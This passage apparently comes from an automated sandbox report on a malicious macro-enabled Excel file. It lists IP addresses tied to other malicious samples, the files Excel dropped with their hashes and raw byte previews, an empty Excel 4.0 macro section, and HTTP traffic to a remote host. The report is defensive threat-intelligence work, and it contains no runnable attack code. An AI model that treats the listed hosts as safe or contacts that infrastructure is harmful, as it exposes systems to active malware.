              NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINdocuments-1887159634.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-748443571.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1887159634.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-683917632.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              documents-1760163871.xlsmGet hashmaliciousBrowse
              • 103.205.143.227
              ogknJKPa1C.apkGet hashmaliciousBrowse
              • 43.228.237.131
              ogknJKPa1C.apkGet hashmaliciousBrowse
              • 43.228.237.131
              #Ud83d#Udd04bvoneida- empirix.com iPhone 8 104 OKeep.htmGet hashmaliciousBrowse
              • 103.83.192.66
              PI.exeGet hashmaliciousBrowse
              • 103.250.186.101
              #Uc138#Uae08 #Uacc4#Uc0b0#Uc11c.exeGet hashmaliciousBrowse
              • 103.205.143.111
              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
              • 103.250.186.248
              4vnTrjsACd.rtfGet hashmaliciousBrowse
              • 103.250.186.248
              955037-012021-98_98795947.docGet hashmaliciousBrowse
              • 103.250.185.39
              FEB_2021.EXEGet hashmaliciousBrowse
              • 103.250.186.248
              2S6VUd960E.exeGet hashmaliciousBrowse
              • 103.250.186.248
              ZjPOfkD2zH.exeGet hashmaliciousBrowse
              • 103.250.186.248
              PAYMENT.260121.xlsxGet hashmaliciousBrowse
              • 45.64.104.167
              NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
              • 103.250.186.248

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):8301
              Entropy (8bit):7.970711494690041
              Encrypted:false
              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
              MD5:D8574C9CC4123EF67C8B600850BE52EE
              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\761041BF.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):848
              Entropy (8bit):7.595467031611744
              Encrypted:false
              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
              MD5:02DB1068B56D3FD907241C2F3240F849
              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B5BE736.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):557
              Entropy (8bit):7.343009301479381
              Encrypted:false
              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
              MD5:A516B6CB784827C6BDE58BC9D341C1BD
              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4AC70B4.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):8854
              Entropy (8bit):7.949751503848125
              Encrypted:false
              SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
              MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
              SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
              SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
              SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
              C:\Users\user\AppData\Local\Temp\91DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):95644
              Entropy (8bit):7.876847080944676
              Encrypted:false
              SSDEEP:1536:m/JbW9FdM374yC2hawvTJIVseTSV7SaTe8NDUYl+LrHtlmuzx2rfg8:GJbW9FdM37OMvhnSaTDDFysE2rr
              MD5:050A914F070781F5D082643D109AC64B
              SHA1:19454C889848ACEE4AB57B46D558D9F7559057C6
              SHA-256:8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
              SHA-512:6813F90051781DCDEE696054FC2777D5921DAE1819C67D7A25E6AC4521B81F56E6B736902416D9727F793AE5F6BB9403D552F4B6D2F1D9560539B998438A5285
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12345.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=95644, window=hide
              Category:dropped
              Size (bytes):1984
              Entropy (8bit):4.515851448728121
              Encrypted:false
              SSDEEP:48:8ufc/XT0jFt1QBaQh2ufc/XT0jFt1QBaQ/:8r/XojFtuBaQh2r/XojFtuBaQ/
              MD5:A42E1B2F2EB49399030FF949E1FD9AA7
              SHA1:E549D5FDAB738F24C17AEC23D61D65C03095C78D
              SHA-256:B9565B4E5D4619DA0F545F7B203C1E02D4C42DDAE508CC6E7CF4C9BF04C95921
              SHA-512:253ED6013AD30706BC834C52325F2DA74316EDF5AE423CD32796A43DE039D97F70138F9A5AA85E97CBE4658EBDBE617E600833EF9998DB421C68B30DF6189384
              Malicious:false
              Preview: L..................F.... ...jK.{.......+.......+...u...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..u...R. .12345~1.XLS.B.......Q.y.Q.y*...8.....................1.2.3.4.5...x.l.s.m.......t...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\12345.xlsm.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.3.4.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=12288, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.477827899747489
              Encrypted:false
              SSDEEP:12:85QpCfsfsCLgXg/XAlCPCHaXtB8XzB/6MExX+Wnicvb3bDtZ3YilMMEpxRljKg1x:85akU/XTd6jcxYefDv3qXqrNru/
              MD5:17C5ED0D3A4A2A9F20A997F68242EE84
              SHA1:82196D6FC7570C3DE1D7614294EB4F3B70330846
              SHA-256:44E7F9FEBF8656BFE856E002228F3D57C23D2CE704C1235D25F4FA3C8ECA0A5D
              SHA-512:B3FEF15814C7CAEC05C27AE9358CD1780E8241F26B51C4DACECED0963C7893C626C60F9BBDD1DC1EA3C5E9AA03347577A361090F80CFD801408E8411A7A110F6
              Malicious:false
              Preview: L..................F...........7G.......+.......+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):70
              Entropy (8bit):4.450013373778756
              Encrypted:false
              SSDEEP:3:oyBVomxW/LprXC3QLprXCmxW/LprXCv:djALBIQLB+LBs
              MD5:8D90BE2693870D9F8B85B2F981628B31
              SHA1:F1EA8A5440EFA7E99E91415481FC9DD89EF0D2E7
              SHA-256:AD0BDAAB996D0966EF9B85AED4713407724A2889AB06755E43E76103570E7AC9
              SHA-512:7BE5A626FC0670A5A6BD1B3A50359072D9806736816FFFF0FF25CA244BC931AA5EF4D3B751081202FEAA863AC4A2C6551CF528965DFD7152125C8CABE01609B4
              Malicious:false
              Preview: Desktop.LNK=0..[misc]..12345.LNK=0..12345.LNK=0..[misc]..12345.LNK=0..
              C:\Users\user\Desktop\A2DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):95644
              Entropy (8bit):7.876847080944676
              Encrypted:false
              SSDEEP:1536:m/JbW9FdM374yC2hawvTJIVseTSV7SaTe8NDUYl+LrHtlmuzx2rfg8:GJbW9FdM37OMvhnSaTDDFysE2rr
              MD5:050A914F070781F5D082643D109AC64B
              SHA1:19454C889848ACEE4AB57B46D558D9F7559057C6
              SHA-256:8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
              SHA-512:6813F90051781DCDEE696054FC2777D5921DAE1819C67D7A25E6AC4521B81F56E6B736902416D9727F793AE5F6BB9403D552F4B6D2F1D9560539B998438A5285
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$12345.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.884862176121338
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:12345.xlsm
              File size:95672
              MD5:5851c6423d6cffdbfdd9ce4276592acb
              SHA1:8992a00647a35e67a887127b5aa7269cc9c597c6
              SHA256:a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
              SHA512:8a9510adb6020f887e4fa134fe8dc9df394bf055a7c596057ca92e582f72508da624c8072ad73488d8112b402360fcc4d1e4c381ecd247c06b450c17fcd737f3
              SSDEEP:1536:Qb/ndoJz+kgpei9EM5fybX8dz+HAITWPtsmLMWzMNFOfhOJYS6xybsD9fe2hawZ+:QbpJ5fybX8dz+HzT0s+MWzYoUJixzWMo
              File Content Preview:PK..........!...`.............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "12345.xlsm"

              Indicators

              Has Summary Info:
              Application Name:
              Encrypted Document:
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:

              Macro 4.0 Code

              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 6, 2021 09:48:01.163120031 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.201642990 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.201731920 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.202414036 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.283674955 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.613493919 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.613579035 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.613660097 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.613713026 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.613914967 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.652276993 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.682090998 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.720725060 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 09:48:01.720828056 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.721354961 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 09:48:01.803678989 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.127644062 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 09:48:02.127686024 CEST80491668.211.4.209192.168.2.22
